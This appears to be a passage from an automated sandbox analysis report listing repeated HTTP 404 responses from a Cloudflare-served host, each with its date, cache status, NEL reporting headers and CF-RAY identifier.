      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 136Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXfiXuYJ4hadXmEM7sONEP2m4MQat6SkERSgInyk3olB8%2FyTCkHB9wvTJz%2BgVW0ZWgn4wzpHY%2FvjdL3Nm%2Fo0G%2Fw%2BeVKfHB1ZsNgSW49r3D78mp37yvegGleUReY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babef686b810737-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 147Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKbW1Y4HPTxcwBPBIxIFuOUjsGbsPaM6IiXAd0gCMmTFMP9875X41jv%2FHIB2pY3JVz7Pai9QieunjV56GiHCRUmj5a0Az4aB3jgFZq%2BDhZf%2B8td4V0P0WY4tXPY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babefaa5a9a81b7-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 158Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACR1CIV4FDjAhd2ezzKBo%2B%2BmCDuOxvybSxgwkG%2BbAd5HU8pi0XXVuQciCGeO3g2yq6%2BYdcmvE1zckugScTv%2Bv9j6Z6OLnGK86IWyAqmiaNLNoz6qlN7YsvRc8vA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babefec688805f3-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 168Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7Th%2F8Vb4dHHXArb7cx59BBVc87nvJf%2FkctRSGb54018w3bD7fVg3zI5%2Fec8AKupGUwgCcLMuJ0n9cCjXQASLw1zbGqJkvhSaaPE8zL3nDYgQoyt6XKX7OcSQdM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf02e69c8172f-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 179Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbk%2FKlA5H5JLhG8PPhB65XbwQbdmh%2BQuyX7czVbll9LXT2Gn6wLrXAg2J01sP%2BrLITcKC2G80RJdaTG2N3GJ00IoPwRLkpY2uN0YM7%2Bs37rw0vlUL%2BiDrvlu77o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf0706a5c05ce-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Od4qaBQE%2FtUECG2uHXncFSGFpGy%2BElvcGv%2F4Zuev9uqQg3CYtB0J5RH5UGOt1uAq3oNKrZGFbXkZC5ZN8paB1%2F2pdPTk02kUIZNS3jKtbuNJRKQgd08JUWCvWLc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf0b24fe40609-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 11Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woX15csC0YOdsa1t8EAgxqkSaWKCCfkIOd%2Bw7Tlq0AZCVdXVwSZi9akJ%2FX4%2Fz%2FDXfb2Z8hEgZN1RbvaspsX9mjx7%2B5K8T45kDCrg9oMv%2BNEBzj31wMu03OoMeCU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf0f58f11c97c-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 21Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jLzCJsXLh%2FbWWp8BjVWVvbN3PyjdVuDU6cM5nc8f7Z%2Bx3yGVBy1YNlbzREWZFtOZoFTWPylOsvMeUFnOmg90cQlbqRlz5twBb0gZcQF0EnzDJeFM8C7NTFqGUo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf1371bc759ce-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 32Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66FqERb112nzweANwbLdsasmMz7%2FDYqGhx8TV%2BInDLuRcE3Xe9%2Fo0CcLb1X7S4Ag3zmA6d8YHlL7KsnZVtsScPJoowdkcYp3L01kOBtHiO2kCiw%2Bl5qVENt0YzA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf17898bac9bc-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 43Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAyowupOWb5VXJ8gC4tntqPW5lHx8Wi31AqO8BiSuyacK%2BvW%2Bj8bdTSJccpv2AWsWdcPSFfIJC7JQrZwlmmGQw%2FXHYGg793%2F%2BJA0Oo8Nv7kyTTDfZi4IsfhJB%2F4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf1ba687f1ffa-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 53Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUQZXjbzj6ju5s79yPBAjZRr5ZbQySffRYXyCiog5C98MrYxjtX4dfqOvzHoEREzjEpqkWEcgtlnPMoUI77jkK34azHbAEx6NuWJoGWLZ0hVfIDXRrbRWywH9Fw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf1fc3cdb8292-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 64Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jz7VFTiPKQF%2BrRLpb7vN69gK1%2BcUzeYu3BFQsHzO%2FmQB7Hoyaz7PP2PEJ91Iqz4OhWro%2BvS41XUpNsShp%2FwWXGND%2BNVq9DVAV5IhPeLjK9dkC%2FnuyGJawWmzKiU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf23dfbae9c19-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 74Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSvQgm36B3CQEVixDq3DLwJqqF5XXqvULb76%2FrqY6JwvfSAYG14bICP2RkC3%2BlivDeQ11NRp0ElYQUdvNinDT9QqQ0DxTADa9IU3zT%2B7VYeAVDpivDoFpGi%2Fe%2BU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf27f88a9c942-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:44:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 85Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvGrHFVh6PWFBvVSHPcReQAvG0Omr3d9apds8VsHZOTN8ioHKp0%2BhLP54nunsGj%2B29ujAyCl%2BpO8%2B20tzttoyvcV28n1%2BxKZ%2FhluUogbCGQ1Xa1zUUIn0U1DaPU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf2c13d4281db-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:45:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 95Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q5RykvhTjptvCpjS4wBPMhx7sp3%2BIMVVbgt%2BdCZ5ZDBHAQzsmV1mWm%2BfHQUYsE69qHvhdqIMvGmqLPrN6Q39SMHAX1j5kFlAsGbT4Yj4ZUDtLM2umg8S3KmvoWY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf3030f68c591-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:45:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 106Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHBvQLdSwBm9PoKkTUtljEORft8B1GglMqqEBglJjTMkatKnSdWb64zw2yRX6qFMQNH%2F8TYsc7qAPz%2F7OuPcjsXgLOia82dKizi9rdTMsjTqUo9Vd4N94%2FBzd5k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf344da1e57be-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:45:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 116Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7ML22O2MaLNZwkcKS5ZwIoNBgQdWjIPbpKa5C656H0VcHLsJ3mDbZ9IEolDUb1noMxr2onIbst3OkbdrzkLScnR1NkvZYlF4EIUcwP99DxRYaoQW70ruzdv2pY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf38668e43937-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:45:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 127Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2Ft4Tp4q67AjqoGnNYQb3vJ36PjrscP1jipXuXbg4DznR3Hb4YcJ7XJ6OJHXc64pDG09DJPB4mELnEq0%2BEuQhVAsFklDV6mm49lng4PkUvqOGoVLgBwghDiBlnQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf3c7ffb620a6-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:45:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 137Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8mdVRsckUPkt8lQImW1t%2FJNUaQlVWdid47Dt%2B8tQOwfS6LRTGKaX6Jf%2Fwwyu%2FhoOWUjgJQazpjxkQtSARQtuY%2BaOgW%2Bdd0lXnN5SPiV%2F4If74pYAqji2H2U9EA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf4099fdbc964-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:45:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 148Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeJDVuF8OdH73QzQxhx6Ya%2By2rTERqsl2K1PkHi6bLgELQ%2FqL6nLvm10nk7D7QPkyypge0Qv2G2NkjWPH%2F8B7rk9Te4lhDOrjOfdWum19e%2FRC%2BdAzDoTfYaziJw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf44b2cbf7fa2-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:46:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 158Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9rZlVeDhwdqDZZGjQhu0dUlwNp5yTVN8CDPGJU6B0zoyrVMK4M2SFsG29iaDHhvENveahuXEZqOdbgnOQVQ2sHWgdBRoqWOO4U3NgF%2Bq5TZHM0nMTlkHxOy%2FqM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf48cbb7f5b16-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:46:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 169Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpFerUiOo3ZV%2BbxUG8g34luJU5ejspS3NVs3q3CJs2XmEzhBLIZLkq89aryqZdIuxLnwRKNWVBj0ZdMOukG4KD%2FvXYU%2FB4y%2Bz%2FWxC6azEhijd6PBBys1vx21i1o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf4ce5fc505e2-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:46:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 179Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNIMbtOHrHgJlLrjgfSeKe%2FL%2BGXi9zf5%2B4BVoo87xepPBkNa48MR2OZKtRgL2hVw06Eoyk8ByvYbFOoZq%2FZs8XbiuIqUfl5P2iAH2OBG4iNDvsOkUL2ItgjTUsU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf50feb7f0949-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:46:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTE2Sv77XFRjvS8qsqlko1AXrAWneT8Lgnx0krqqZJj%2BallBnvx8eQbG%2B5eDjz4dxLXn7pF1jYX4RbWUL9ZzMDi6nY8h%2FHmfHx3PDDnRzctcZXY5xqeDFxXgX2w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf5518b0c05c2-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:46:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 10Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMZVqUKXFMvt2oMoa48tTQ6wtJGNlsj%2BV0xfFDSCUlN4MdFfYHKliDJuGvqvQdJspkuekEbN9gYQKsm%2FN%2FCX%2B9QswbCJYmma%2FmsNw34w300XjQjpejXGy4rijac%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf594ad5d801b-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:46:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 21Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2e7n4Gsfk9EOUGZg0NvISoDMYY5slzc%2BuhdL6VsJXvTznTMhPQFig3bIc5SBS0xOp1js7%2BZlr7KJ4ZKaUFT830IKXSxADI5iWUIT%2Bjez%2BQ%2BzACGDLjB0CHTtaDQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf5d68da12d28-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:47:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 31Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9E4enV9EQITKn2RdaDLiP1UOL%2F4RcQ3ckHhSfEealRp%2BJr%2Bs6pVErAmRvyglu6UI7uWTGZlJKq6%2Bw%2BC8BIWPeI2PVbnBWrRNkS%2FQk7vcvV4gitiB6PZ9ZnfYyY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf6182f97061a-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:47:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 42Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FSMgWbpddeq%2FNvt4ouFM%2Ft8tKPaxufufFx4ue7U4Qi3HEA1ervrhFkn94kyx8AstrXZf9lon1y1gr0dWGtL0%2FbsJwUQcZC%2B88dTjCGMFKJYWGooBCqENCmkkGs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf659ee228293-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:47:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 52Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFdsMkrc8RRA2jzkju2Dw8YfkBOYChY%2BEGc3nHm3kIXPFWw9F3UVUDtLhDBvQbwh6Wg7aerf%2FHvzGIPhbFjr8q%2BHOzwBdSezZB6%2B%2FdYhD7tu22gnwnrrCpoRlbg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf69bfe628236-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:47:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 63Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TijnKBodBwojS8fKVLojY4UC1Zb7qH4Z%2BxtG9PrWXRFiC80y5FNVswJzJLm0s5U0zdJRIgFfLZocw2Ur5PB80w5E4dR3i6Lkv31RTT9IhqHycTD8v6SWJwJBJCo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf6de0f7707fb-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:47:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 74Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6y9po9cH2nR7wTK5ZhBrQFqpL6XH8LRPJgEsXPzNxbZPFXkx604oL8xF8tKONIlMDQBjbn4NiZJ1F8%2F4MzoNkLpzMF4e%2FTLAfb3v07Zg4JJx8awOkQkv2DNogU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf720183182b6-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:48:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 84Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkJ5muxbGh3WKoyUAuIjzC29ofOziiGvVSYbGuOiaLSxUxquXjRmKH4x0GOwL3PlJ%2BFgCW9S6PKXfKzgsUNHeYU%2BRtwomMTuu4KRYo%2BT%2FgzLC1BMk453BH0JSes%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf761c9cf588a-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:48:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 95Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aDB4%2BOqdQtNoXmdnoTwWpdHpIsfDYmEtXWW0tXRoz%2FPb0Q5QiF31cAPs8jSnMVLyadDzg%2FnEfE4a7Z5xnOSQRkMHpJMIfIhboElqhIyGydqjP9Tiraq2vao8TE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf7a3898859bc-IADalt-svc: h3=":443"; ma=86400
